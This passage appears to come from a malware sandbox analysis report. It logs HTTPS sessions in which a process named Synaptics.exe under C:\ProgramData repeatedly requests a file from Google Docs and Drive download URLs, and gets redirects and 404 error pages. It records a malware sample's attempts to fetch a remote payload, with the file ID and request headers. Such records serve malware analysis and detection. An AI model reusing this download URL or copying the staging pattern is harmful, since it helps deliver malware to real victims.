                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
                                                                                                        2024-12-30 10:49:24 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                        2024-12-30 10:49:24 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 4a 37 39 52 62 6e 79 30 68 73 30 49 7a 30 6c 49 37 50 75 4c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                        Data Ascii: t Found)!!1</title><style nonce="rJ79Rbny0hs0Iz0lI7PuLg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                        2024-12-30 10:49:24 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        17192.168.2.949828142.250.186.784431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:24 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-P6BIK4_a_kJMvLuYgmhBbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        18192.168.2.949832142.250.186.784431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:24 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ur9_tHGovhgHWFNtexdCyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        19192.168.2.949831142.250.185.1614431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:24 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Cookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4
                                                                                                        2024-12-30 10:49:24 UTC1250INHTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC4S5g4t3SWXij-KClfUemaXlB8_rsvtspU9fV1I3vaG3hveboCsX_eMR7Zi-p1gUS32IPQaGxM
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-jwYAdiakL0FSGzT3UMPO5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
                                                                                                        2024-12-30 10:49:24 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                        2024-12-30 10:49:24 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 54 67 31 70 7a 5a 65 66 47 73 69 65 49 67 55 36 31 63 79 48 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="ATg1pzZefGsieIgU61cyHQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                        2024-12-30 10:49:24 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        20192.168.2.949844142.250.185.1614431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:39 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Cookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4
                                                                                                        2024-12-30 10:49:39 UTC1243INHTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC4Yg-_WH4y30xhRrrEG3jTfvLYeNTooJW30ylJ6Iggtz7UblDYnQWJJsqU-757OIJ0y
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:39 GMT
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-HZlhWaCROmmg7RIlfcTmyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
                                                                                                        2024-12-30 10:49:39 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                        2024-12-30 10:49:39 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 45 74 75 35 35 4a 50 46 32 5f 46 37 46 61 50 39 63 52 41 45 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                        Data Ascii: t Found)!!1</title><style nonce="_Etu55JPF2_F7FaP9cRAEA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                        2024-12-30 10:49:39 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        21192.168.2.949843142.250.185.1614431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:39 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Cookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4
                                                                                                        2024-12-30 10:49:39 UTC1243INHTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC50BE3-2LStuuc5rp9xFH-Pn9KVXI6x6tMBqiT5Zxc4yHbyNJgYC0wycPhnaXkAwrDF
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:39 GMT
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-kJNzl2MIYswmXG7sa4wXVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
                                                                                                        2024-12-30 10:49:39 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                        2024-12-30 10:49:39 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 34 41 6e 49 48 70 67 79 55 44 33 70 5a 33 32 71 33 4a 68 55 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                        Data Ascii: t Found)!!1</title><style nonce="s4AnIHpgyUD3pZ32q3JhUw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                        2024-12-30 10:49:39 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        22192.168.2.949842142.250.186.784431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:39 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:39 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-HtienGDzWbyqaH1zQR3Bgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        23192.168.2.949841142.250.186.784431360C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-30 10:49:39 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:39 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-H8e8ke0pHi6G7GPzYCx9qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Statistics

